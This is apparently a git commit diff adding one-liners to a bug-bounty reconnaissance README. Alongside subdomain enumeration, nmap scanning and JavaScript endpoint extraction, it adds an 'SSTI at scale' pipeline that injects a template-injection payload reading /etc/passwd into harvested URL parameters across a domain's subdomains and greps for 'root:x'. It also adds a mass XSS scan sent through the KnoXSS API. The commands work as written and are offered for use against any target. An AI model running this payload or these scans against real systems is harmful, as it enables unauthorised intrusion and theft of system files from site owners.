Add some random oneliner
parent
1d9a5ef750
commit
fa2460adec
55
README.md
55
README.md
|
@ -31,6 +31,12 @@ subfinder -d site.com -all -silent | waybackurls | sort -u | gf sqli > gf_sqli.t
|
||||||
subfinder -d site.com -all -silent | waybackurls | sort -u | gf redirect | qsreplace 'https://example.com' | httpx -fr -title --match-string 'Example Domain'
|
subfinder -d site.com -all -silent | waybackurls | sort -u | gf redirect | qsreplace 'https://example.com' | httpx -fr -title --match-string 'Example Domain'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Find SSTI at scale
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo "domain" | subfinder -silent | waybackurls | gf ssti | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | parallel -j50 -q curl -g | grep "root:x"
|
||||||
|
```
|
||||||
|
|
||||||
### Scanning top exploited vulnerabilities according to CISA
|
### Scanning top exploited vulnerabilities according to CISA
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
@ -45,5 +51,52 @@ subfinder -d site.com -all -silent | httpx -silent | hakrawler | tr "[:punct:]"
|
||||||
puredns bruteforce wordlist.txt site.com -r resolvers.txt -w output.txt
|
puredns bruteforce wordlist.txt site.com -r resolvers.txt -w output.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### Finding Cross-Site Scripting (XSS) using KnoXSS API
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo "domain" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss[.]me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIKNOXSS\""}' | sh
|
||||||
|
```
|
||||||
|
|
||||||
|
### Clean list of host, port, and version
|
||||||
|
|
||||||
|
```bash
|
||||||
|
mkdir nmap; cat targets.txt | parallel -j 35 nmap {} -sTVC -host-timeout 15m -oN nmap/{} -p 22,80,443,8080 --open > /dev/null 2>&1; cd nmap; grep -Hari "/tcp" | tee -a ../services.txt; cd ../
|
||||||
|
```
|
||||||
|
|
||||||
|
### Waybackurls validator
|
||||||
|
|
||||||
|
```bash
|
||||||
|
waybackurls http://example.com | grep "url" | xargs -n 1 curl -s -o /dev/null -w "%{http_code} > %{url_effective}\n" | sort
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract endpoints from JS (Part 1)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract endpoints from JS (Part 2)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract endpoints from JS (Part 3)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\";curl -Lks \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract endpoints from JS (Part 4)
|
||||||
|
|
||||||
|
```bash
|
||||||
|
curl -Lks https://example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=https://example.com '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"'##### %\";curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"('#####.*)|(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\" | sort -fu" | tr -d "'\""
|
||||||
|
```
|
||||||
|
|
||||||
## References
|
## References
|
||||||
- [ReconOne](https://twitter.com/ReconOne_/)
|
- [ReconOne](https://twitter.com/ReconOne_)
|
||||||
|
- [jdksec](https://twitter.com/jdksec/status/1236891532256575488)
|
||||||
|
- [atikqur007](https://twitter.com/atikqur007/status/1253235713023320064)
|
||||||
|
- [ofjaaah](https://twitter.com/ofjaaah/status/1532581839344394241)
|
||||||
|
- [pikpikcu](https://twitter.com/sec715/status/1295216521501908992)
|
||||||
|
- [gwen001](https://gist.github.com/gwen001/0b15714d964d99c740a7e8998bd483df)
|
Loading…
Reference in New Issue